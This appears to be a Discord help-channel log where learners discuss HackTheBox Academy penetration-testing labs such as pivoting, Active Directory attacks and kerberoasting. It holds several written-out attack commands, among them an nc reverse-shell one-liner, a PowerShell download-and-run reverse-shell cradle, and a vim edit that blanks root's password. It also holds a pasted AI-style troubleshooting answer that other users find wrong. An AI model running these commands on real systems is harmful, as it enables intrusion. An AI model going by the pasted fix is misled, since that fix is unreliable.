you completed the assessment but it's clear that you don't understand the tools that you used
and networking
I am not that great at regex, but it looks like the file has to end in a 'g'. I also think that the regex says that the file has to be something like one of the three main image types other than gif. I did try those three, but the vector graphic I have no idea how to use other than what the module shows.
I was looking through that and realized I would not have had the ip yet without an nmap scan before I was able to connect back.
How do I connect back without knowing the 16.6 ip?
I eventually could, but that was using the ip I found by running the ping script in cmd on the 17.5.
Only Jesus can help you at this point.
The module teaches it assuming you know the ip at that point
we are SO CLOSE to figuring it out
Sorry wrong screenshot
This is the portion I was looking at
you got the B IP from doing enumeration, yes?
ok so let me break down this even simpler
So are you telling me I have to configure proxifier to then proxychain nmap to find the IP and then continue?
A and B are on the same subnet, when you create a proxy with A you then have access to the networks A has
which is what allows you to connect to B
B and C are on the same subnet, but C is not on the same subnet as A, hence why you can't proxychain to it
you need to create a proxy on B to chain these resources together
So that's what they're explaining with proxifier?
yes
if you do ipconfig on A and B you'll see they have different interfaces/connections :)
and if you check C you'll notice it too
there's a reason I'm boiling it down to A/B/C, it's to break it away from the examples using direct IPs
I see where the confusion was, thank you!
It was the fact that there were three rdp sessions in the module, where I only had an SSH tunnel for A on the skills assessment.
yeah and easy one to miss if you're new to Windows! That's why I said you'd become a good Windows administrator 😉
So I didn't think that the proxifier and server portion was needed in this case since I was just going to RDP into it anyway.
And on this day... nothing was achieved.
all these squares make a circle 
Thank you @fathom pendant
So you did answer my question, I did not have to run the script in CMD, I could have gone through that method further to tunnel back.
The TL;DR is you can do whatever works for you. There is no definitive answer in right or wrong per se. The important take away is the core concepts... which I'm just gonna leave with that statement.
👍 Thank you. I'm glad at least I have a shortcut for the exam, but wow, I knew something was missing!
the way you did it isn't incorrect per-se but your initial question was getting it to work with proxychains
Yeah, I knew there was probably a way to do it based on the modules. I know there's a lot of instances of "do your own research" on Academy, but my gut was telling me that there was something in the module. I guess the lesson I learned from this, besides the one @pearl torrent mentioned, is to not use the sections/modules as a procedure or methodology, but rather as guidance. I guess what I'm trying to say is I'm not going to do stuff in order necessarily next time.
this is why I spend extra time on modules: to understand the concepts behind it - not JUST "oh hey let me just copy/paste verbatim" which is super easy to get trapped into on some modules
because it really do be like that
especially if you're given a one-liner that pipes outputs to other commands
understanding that first command does A, second command takes A and does B to it, third takes B and does C...
it's why, if something isn't working, walking yourself backwards helps
if a piped command isn't working, find out where the leak is
spent like a good hour trying to figure something out in AD Enum and Attacks: only for it to be a command conflict with Active Directory and PowerView
Trying to fuzz it shows that /image/jpeg does not work, even though I would think that the regex says that it should, right? I am still stuck. I did not get anything back from the fuzzing. Reading the PHP makes it seem like I am right. I am still not sure why I am still only getting the "Only Images are allowed" error
the modules and sections give you tools in the toolbox and some context of when they may or may not be useful. It is ultimately your responsibility to know when to apply or even combine tools together to succeed. These tools in your toolbox might be literal tools, concepts, processes, etc.
that's what every module skills assessment has been trying to do the whole time. Test your understanding to see if you can use your toolbox effectively.
which is why I keep getting mad about copy pasting, because 80% of the time that's not how you should be approaching things.
fucking with commands is how i found out hashcat had an output mode THIS WHOLE TIME
and how me and f0x discovered this was the issue with what i was doing
Yeah, I like messing around with tools and trying stuff from the man page or help.
I am still stuck on this image upload. Can I just use a regular image open it up in terminal and add the payload at the end of the text?
I assume all the servers are in Europe, which I did not think about before. Gosh darn it, I wish I swore and drank sometimes lol
why not try it and find out?
best case scenario it works, worst case scenario you learned something :)
I did, and it took me about forty minutes to think of the date, or so I thought, that I was doing something wrong. I could have had this done hours ago if I would have not tried to do exactly what the instructions said, tried to use the little cheat sheet, and thought out of the box like I tell my family and the folks that I supervise.
I am glad no one told me the answer.
It really is a good feeling, lol.
nice, congrats
Thank you.
I am on the File Transfer module on the Windows File Transfer page, attempting to perform the second question asked. I've uploaded the file upload_win.zip onto the Windows computer and I've unzipped the file. I don't have permission to use hasher on the text file as suggested. Instead I've created a new file, copied the contents and was able to use hasher on the new file. The hash that is generated does not appear to be the answer to the question. Have I missed a step?
the game was rigged from the start
ty tho !
hasher on the Linux server on the next page was able to hash the file from the Windows server page correctly; the Windows machine is not working correctly
RDP and SOCKS Tunneling with SocksOverRDP
I followed all the steps and the real-time protection is also turned off and the .dll is loaded into the registry, but when I ran the server I get this error
[-] Could not open Dynamic Virtual Channel, plugin was not loaded on the client side: 31
svchost failed: I see this message from my proxy. I did as they said in the module, idk where I'm wrong
Hello everyone, I am stuck on the very first question of the Password Attacks: Network Services module. The question is: "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." I discovered that the 5985 port (for the WinRM service) is open but the nmap -A and -sC options didn't yield anything interesting. I couldn't find any scripts for enumerating users for WinRM with nmap, so do I need to use crackmapexec right away even for the username or should I keep trying nmap?
Doesn’t the module provide a user and password list?
In resources
Aha you're right I didn't see that
heyo! guys I'm stuck in the module "Attacking Common Services" DNS. subbrute does not find anything for inlanefreight.htb
I'm very confused, as in the module examples we started working with .htb and switched to .com ... why is that? :/
do you mind if I DM you? I'm stuck on task 3 of that skills assessment, tried Abusing Access to Shared Folders on ||ShareBackups(BACKUP01)|| and ||ShareSQL (SQL01)||
Of course but I can't answer till 30 min approx
Did you add the target IP into your /etc/hosts file, i.e.
10.129.203.6 inlanefreight.htb
yup
but the AXFR transfer just fails
I'm using subbrute, but it just breaks
I'm stuck :/
Hello,
I have a stupid question about Pass The hash attacks.
Is the injection of the new hash in the lsass session considered part of the PtH attack in itself, or is it a mandatory step before the attack itself but not part of the attack per se?
Sorry about my english
@dusk shore echo "inlanefreight.htb" > ./resolvers.txt
./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt
I added the IP address of the attack machine as well to resolvers.txt
I have another foolish question. Does anyone else use WSL2 instead of a standard VM? I only have Kali this way, but I did find a way to install Parrot
Then try dig AXFR @inlanefreight.htb **.inlanefreight.htb
I get:
IndexError: list index out of range when using subbrute
adding ./ worked.. -.- thanks and sorry for disturbing you guys.. Thank you trev0ck! 🙂
No worries, glad you got it! 🙂
Anyone familiar with Information Gathering module? I'm stuck on Active Infrastructure Identification page
you mean INFORMATION GATHERING - WEB EDITION ?
if that's the case, I found most of the answers to the questions with Wappalyzer.
Now I'm the one that needs some help. I'm doing the AD Enumeration & Attacks - Skills Assessment Part 2 and I'm a bit stuck on question 8, which is to get the Admin flag in MS01. I think I need a domain user that allows me admin rights, and using BloodHound I found one that is the answer for question 9, but I can't find the hash. I will appreciate some nuggets
Mimikatz
mimikatz in SQL01?? because I still don't have admin on MS01, so I can't run mimikatz from what I understand
Yup
got it, will try, thanks
You can look for the path from sql01 to ms01
In the Service Scanning module in the Penetration Tester job path could anyone please help me understand where am I supposed to obtain the OID from in the first place? It's right there in the command they're running but they haven't explained where to get it from.
Can anyone help me on the first part of Linux Priv escalation in the environment enumeration module?
yes someone can help you
hi there, anyone willing to explain to me or lemme know where to read about what this means: ':%s/^root:[^:]*:/root::/\nwq' ..!!!
Chatgpt
good point, I didn't see it. thanks
hi
Has anybody had trouble spawning boxes? trying to do the training lab in Documentation, but the box is not willing 🙂
Web Requests
Stuck on a question:
Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'
I use the command:
curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://my --data-raw/search.php
help me please
I'm so confused that my head is spinning...
I feel like I’m walking around somewhere, but I can’t understand..
--data-raw is used for sending raw post data without any processing; if you want to send json data stick with -d
Didn't understand(
For me it finally looks like this
curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://83.136.253.251:33659/search.php
remove the --data-raw flag since you're already using -d
Tell me honestly, am I three? Or am I doing something wrong?
you’re three
Got it, I'm stupid)
😉
you are here and willing to learn 😉 all that counts.
So this is how it should look, right?
curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://83.136.253.251:33659/search.php
?
yes
so you need a valid cookie.
^
That's it, the train has arrived😫
😣
What kind of cookies? why cookies?
ukillmepls)
reread the question you try to solve
I’ve already done this 100 times and I just don’t understand what he wants from me. My brain is just overloaded...
hey y'all, I'm stuck with the LPE capabilities exercise. I'm doing the step-by-step described in the section with no success, any hint will be well received....
Am I going in the right direction? Or did he go to the wrong place at all?
hey, I got a problem with the WINDOWS ATTACKS & DEFENSE skills assessment
I get the base64 from the first attack, then do the Rubeus one, but it gives:
krb-error (16) kdc_err_padata_type_nosupp
I looked it up, some say it's because it's disabled
alright, saw this and will try, and will edit later for future errors
sorry, forgot to remove ping
In short, I found the answer, but can someone tell me the solution to this problem in more detail?
tried it one more time and it didn't work
any mods?
#modules message See if this message helps?
never run as admin
Password Attacks Lab - Hard: is it normal that || Logins.kdbx || takes a lot of time to crack? (I'm using my local GPU with mut_list)
go through that section again
2 things: make sure you're doing the right mode, and I believe it's either in the mutated list or rockyou. Most time I've spent is maybe 5-10 minutes
"https://academy.hackthebox.com/module/143/section/1274"
"Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer"
I tried the commands used in that section and when I execute the command, it asked me for a username and password. The credentials are not listed in the section. Are we supposed to use the credentials for the user forend that was found in previous sections?
should be forend if I remember right, check earlier sections
I'm on the Active Directory skills assessment. I got the reverse shell on my local box. Is it normal that my shell doesn't output anything?
I run commands and it just doesn't run anything... there's no output on my terminal
I used powershell #3 base64 get a reverse shell but no output for most commands.
You should be able to follow the section for the most part (aside from changing some stuff for it to get SAPService) but aside from that it's fairly doable
How are you studying for the oscp exam
Hi
I have a question in the documentation and reporting module.
So in university our teacher told us that we should not go into details when telling ppl how to fix a vulnerability.
But in the course they go a bit in detail in some places as far as to tell someone what he should change in a configuration file.
So I am a bit confused on how I should write a good remediation,
Like let's say when u try to login they tell you if the username exists or not in the error message, so here should I tell them to change the error message in a way where I can't enumerate usernames or should I also suggest an error message
Or let's take another example, let's say I can read a file that I shouldn't, so here should I tell them that they need to remove the read privilege or should I also give them the command?
So. The point is really that you should not be making changes yourself. You can absolutely suggest fixes based on vulnerabilities- but your goal as a tester is to find and exploit vulnerabilities - there's a whole separate team that should handle vulnerability management and mitigation
Something that's common is "username and/or password is incorrect"
If it's a simple on/off config change that's different than "here's a whole command to fix it"
Ahh ok, so if it's a simple config I can add it as a recommendation, but what about the other cases, if it's a simple command like just chmod can do it? And for the other case, can I suggest a different error message?
basically suggest what should be fixed and why, but not how, you can make recommendations based on the finding, like if they use weak passwords, then they should enforce password policy/use a password manager, but don't include how to implement those
Yeah, I get this, that's exactly what our teacher told us, but I'm a bit confused about cases like the example I gave. For the error message, should I just tell them to change it in a certain way or should I give a suggestion? (the entire question is about the suggestion part, is it ok or not)
So a recommendation like this is ok?
Change the error message in a way where an attacker cannot enumerate usernames, u could for example use this error message " the provided credentials do not match our records "
something like "do not reveal user information through error messages" is enough, how they want to word it is their choice
Using "for example " stuff reaches into recommending what to do
is that supposed to be 'whoami'?
Ok I get it thank you so much @fathom pendant and @next bronze
Friends, I'm about an hour into trying something but it's not going very well
Probably a formatting thing with your light mode extension
I tried adding it to hosts, nslookup and a bunch of shit
it's a screenshot from the Linux Bible pdf
Remove screenshot, it reveals info
oh, my bad
okay, I am really stuck. So I'm on Active Directory skills assessment 1, question 2. I've found a couple of users. I want to start running a few tools, but my terminal is not at all showing output, except for like system commands or so
Look at available ports on the target
That's not the point of what I said
Lol
Look at the ports available for the system
try these credentials in other services?
Yes
give me a sec
Im trying to run Inveigh for example. No output.
Anyone, I have a problem with the machine Devvortex. I'm just trying to nmap it, but the output says that the host is down.
This isn't the place for active boxes
ok
then you need to fix your shell
This channel is for help with academy modules
yea I figured there must be something wrong with my shell.
don't see what tho, is powershell#3 not good enough?
use something like Invoke-PowerShellTcp, should be in the module
hello guys, doing the skills assessment for the Reporting module and just wanna know what they mean by this: "complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host."
it's exactly what it means, own the domain then get the flag
the in-progress
The report you're given is "in-progress"
Meaning you're tasked with completing it
^ read the section, you're given a scenario
did you figure it out?
Yes, thank you!
I'm actually asking for help
spent way too long on this, dm?
Sure
hmm, that doesn't work
I do get other shells. But for some reason none is interactive
Im trying this
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.198:1337/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.198 -Port 1234
aaah it worked
No, it doesn't. My shell is still not showing any output. I'm running inveigh.exe and it's just a blank screen on execute
am I missing something?
ah inveigh.exe has interactive mode which needs user input to stop, powershelltcp doesn't show the output until the program has finished
check if it saved the hashes to a log file in CWD
IT DID, okay, Ima let it run for a couple minutes and come back to it. Though this now works, it doesn't fix the rest. mimikatz for example also doesn't show output
'What powerful local group on the Domain Controller is the SAPService user a member of? '
https://academy.hackthebox.com/module/143/section/1274
So I would have to use one of the tools from the previous sections to find the local group? I tried the net command and that seemed to not be recognized (despite following the command format)
$net user SAPService /domain
Invalid command: net rap user SAPService
Usage:
net rap user add Add specified user
net rap user info List domain groups of specified user
net rap user delete Remove specified user
mimikatz is also in interactive mode, you can set it to run and exit
.\mimikatz.exe "privilege::debug" "<command here>" "<more commands>" "exit"
also useful for use in evil-winrm
You know when you use GetUserSPNs there is a column of "memberOf" yeah?
Also, that's weird it's seeing your net user command as "net rap", maybe a typo?
It suggest that 'rap' be in the command when using it .
apologies just noticed you are looking for "localgroup"?
are you running that command prompt command in a linux shell?
I am running the command on the machine that I ssh'ed into... since it requires that I use my local address on that machine
No that is a windows command to be executed in a cmd.exe or powershell prompt.
hmm... but only 'ifconfig' works on that machine and this is a kerberos linux section
It implies you are kerberoasting from a linux standpoint... kerberoasting service accounts remotely from a linux machine. Not kerberoasting the linux machine/accounts on the machine itself if I understand you correctly.
so the IP address(172.16.5.5) is the windows machine one
That is the IP address of the Domain Controller if I recall
essentially yes it is.
I'd advise you to read the section over again.
So I don't 'xfreerdp' into the Domain controller: I tried that with the following command and that failed.
xfreerdp /v: /u:||SAPService|| /p||:'!SapperFi2'|| /dynamic-resolution
Okay, the section is trying to teach how you can kerberoast without access to a windows box but with a valid pair of creds. They assume you use the pwnbox to achieve this. RDPing into the DC from your vm is impossible because that's a whole other subnet out of your reach (unless of course you explore and pivot thru the pwnbox, which I encourage).
The task is simple, use the pwnbox to practice the attacks shown in the section and attack the SAPService
You need to take a breath and read over.
It really is very explanatory.
I believe the "kerberoasting from windows" section would require you to rdp into a windows host to practice that. atm you have no need to rdp into any windows machine.
you guys are overcomplicating this, the group is given in GetUserSPNs.py's output
I literally just said that.
There is clearly a lack of understanding of the task of the section.
oh yeah you did
Reading things properly challenge: difficulty - illiterate
Are the servers synched timewise? Are they at the current date?
for skill assessment 2 on the attacking common applications module.. I am trying to run this, but I get an error about -c.... this is the command I am using... can someone give me a hint as to why this may be happening? I thought maybe the PW would need parentheses or so, but that didn't seem like the reason. Also.. the full UN/PW is not in this command but I do have it
||python3 49951.py -t http://gitlab.inlanefreight.local:8081 -u na -p &^lC -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.212 8443 >/tmp/f '||
meh, my assessment lab is so unresponsive
a normal nmap scan takes about 15 minutes
maybe switching vpn region?
That looks to be a switch region and respawn lab
k ima give it a shot
Are the servers supposed to be at today's date or do they run at some random date?
Should be today's date
Note EU servers, if you're on US, could be at least 4-5 hours ahead
I should be on the same continent. I am doing File Upload Skill Assessment and there's something where they prepend today's date to the file
fuck me... that was it
added + 1 to the day, I had been at this for 2 hours
thanks hahaha
Btw I think other people have had this issue, using discord search is helpful
yeah I usually do, guess I didn't think about it this time
I'm working on the intro to assembly language module, section "syscalls". I'm trying to print the current fibonacci number but I can't get any output. I used strace as well to see how write() is being called. Can anyone help me figure out why the numbers aren't being printed? Much appreciated 🙂
My code is here: https://pastebin.com/RVH1vZK7
much better @fathom pendant
My assembly is pretty far away but is it printing just nothing but your header?
you need a lot more than just using the write syscall to print, the data is stored in binary, so you need to prep a buffer, convert the data to ascii, null terminate it, then print. the further sections go through how you can do that with a library
yes, this is what I see
Yeah I figured, but I was trying to solve the "issue" now instead of seeing how it's done later
isn't the stack pointer just above the last value? I am just going off memory
although even with 0 or garbage you should have something
if it tries to print a non printable character then you might not see anything, you're just forcing the syscall to interpret the data as ascii
it does show the string as "\1"
anyone have any issues spawning targets? ive tried in three separate modules now and none of them are spawning
oh, I think you need to convert it to ASCII as Xreous said. do a + 48 for single char numbers or convert to string.
you are literally trying to write "byte 0". That's why it's "\1"
use gdb to debug so you know exactly what's in the registers, strace lacks a lot of information
Footprinting / Medium
||i mounted the NFS||
||found credentials in ticket||
||smb with found creds||
||found more creds inside /devshare/important.txt||
||now I try to RDP on p3389 but for some reason I don't get it to work||
can i doublecheck with someone what part of the given string is user/pass?
oh nevermind, used the wrong credentials, the ones from admin xD
Need some support on Password Attacks - Hard lab. I found the kdbx file but I'm not sure how to transfer it to the attack host. Doesn't seem like the windows host has python installed, or the base64 command. Some help would be great
man xfreerdp and see what other options exist that may help
Thanks, I had a feeling that may have been the way
You can also host an upload server fwiw
can I also check with you about ntlm relay skill assessment?
On the Active Directory module Initial Enumeration of the Domain section it asks me to RDP into the ip provided at the bottom, but when I scroll down it tells me to ssh.
Which one am I supposed to do?
Rdp since wireshark is gui
Yeah, I just went back to the previous section where they talked about XRDP on their ATTACK01 host. Thank you.
Is there a reason dynamic-resolution is not working?
Same Active Directory module Initial Enumeration of the Domain section
It fullscreens with /f but that's not ideal
Do you have an actual question about an academy module? Because at this point I'm getting fairly close to blocking you as I should have.
the /size option worked, so why not /dynamic-resolution
it just doesn't like you ig ¯_(ツ)_/¯
Apparently, dialed it in with the size option so I'm good now I guess.
why use /dynamic-resolution when trial and error with /size feels like a fine art 😆
Lol, the view of wireshark was completely UNSAT at the default resolution.
Looks great now though!
I troubleshot a dumb issue: I forgot the : after /p and was confused why it wasn't working
Hi team, just wondering if it's possible to do 2 labs in parallel, mean increasing the limit to spawn 2 (or multiple) targets?
No
hmmm, thanks!
When you spawn a new target it despawns the old target
yea, that's what I noticed, thanks for the reply, appreciated!
There's no real functional reason to run multiple target labs either
As they will be functionally focused on different things
actually I was doing the bruteforcing exercise and it's taking maybe hours, I was wondering if I could do others.
What module?
passwords
Password Attacks?
yep
got it.
I believe you should get it with ftp
Also you can increase threads with -t
48 is the sweet spot for most
I tried ftp with -t 50 but it started timing out.
got it, thanks for the hint.
appreciated!
There's also a tool called ssb, haven't tried it myself but apparently it's REALLY GOOD at attacking ssh
You can have friends sign up with your referral link and complete the on boarding stuff and modules but I don't recall the specifics, probably a help article on it
thanks but I need to learn about bug bounty and for bug bounty I need one thousand plus cubes 😭
not my problem ¯_(ツ)_/¯
If you have a university email that's the cheapest route
Otherwise there's other platforms out there to learn for free
I'm not being an ass btw: literally Google what you want to know and there's likely articles and stuff you can learn from
Tryhackme is another platform
Something you can do is look at the module overview and Google the module topics
¯_(ツ)_/¯
Piecing a solid fundamental knowledge of bug bounty hunting together is going to be a challenge without some sort of curriculum. I started with TryHackMe Complete Beginner, and moved on to TryHackme Offensive Pentesting. Then I came here to go for the CPTS. You can do it yourself through resources online, but without a curated curriculum provided to you, it will take way longer than it is worth.
https://portswigger.net/web-security
That being said, check out portswigger's academy. As far as I understand, it is free.
Hi, could I get some hints about "NoSQL injections - Skills Assessment II" ? I'm assuming the injection is in ||/reset|| but cannot find it in the ||token parameter||.
There's an attack type mentioned in the module but they don't go over it in detail. But it should be the same concept to exploit. You'd need to Google a bit too. Your hint is ||Time||
Timing attacks: These are attacks that analyze the time it takes for a system or algorithm to perform a certain operation, such as encryption or decryption, and use that information to infer secret data or keys.
Race conditions: These are attacks that exploit the situation where two or more processes access or modify the same resource at the same time, and the outcome depends on the order or timing of their execution. An attacker can manipulate the timing or order of the processes to cause an unexpected or undesired result, such as privilege escalation or data corruption.
Replay attacks: These are attacks that involve capturing and retransmitting a valid message or data packet at a later time, without the knowledge or consent of the original sender or receiver. This can allow an attacker to impersonate another party, bypass authentication, or modify the state
Can someone help me to fix this problem?! Because of this error I have a hard time doing the new "ADCS ATTACK" module's task
When I use the certipy tool, every time I am seeing this lib error
I'm sorry to hear that you are having trouble with the certipy tool and the ADCS ATTACK module. Based on the image you sent and the web search results I found, it seems that you are facing a common error related to the pyOpenSSL library. This error occurs when the lib module does not have the attribute X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT, which is needed for some cryptographic operations.
One possible solution to fix this error is to remove the line that causes the error from the crypto.py file in the OpenSSL package. You can find this file in the /usr/lib/python3/dist-packages/OpenSSL/ directory. The line you need to remove is:
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
After removing this line, you can try to use the certipy tool again and see if the error is gone. If not, you may need to uninstall and reinstall the cryptography and pyOpenSSL packages using these commands:
$ pip uninstall cryptography
$ pip install --upgrade cryptography==36.0.2
$ pip uninstall pyOpenSSL
$ pip install --upgrade pyOpenSSL
You can also check the version of pip and werkzeug that you are using, and make sure they are compatible with the certipy tool and the ADCS ATTACK module.
nice chatGPT answer
:^)
Damn, I checked it, it really looks like a chatGPT answer 🤦♂️
even their response about the different timing attacks look chatGPT generated
I don't have CB_ISSUER_CHECK in crypto.py, so it really is a chatGPT answer. Remember chatGPT is trash when it comes to troubleshooting
if you use -debug it will run a stacktrace to give you the location of what module/line failed btw
as it shows in the output
I saw that. I am afraid to do any manipulation to the code, I might break the tool, because I did that before. I will try to search for another way
i just mean running the -debug option helps you figure out where it fails
It just gives you a better idea of the error.
so you can be more accurate in your search for fixes
Yeah I understand thank you !
instead of the vague "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT" which to be fair would make sense since the certs are self-signed
is there perhaps an -ignore-certs option in certipy? or something along those lines
also is that IP the DC?
Yes as module showed
The confusing part is that 2 weeks ago I could use this certipy command: certipy req -username EVIL01$ -password 'Str0ng3st_P@ssw0rd!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -dns authority.htb -debug
when I was doing retired machines with a write-up
¯_(ツ)_/¯
I guess I will reinstall my linux, it will help 100% 😂
But It helped me a lot 2 times
enough to solve troubleshooting
You should first try reinstalling the tools LOL
I did
Reinstalling OS my last chance
Yes of course
thanks
domain?
I've not really seen it be lab.local, generally seen it as inlanefreight.local
@hallow remnant I solved it but am interested in knowing the nosql tool you used, did you mean nosqlmap ?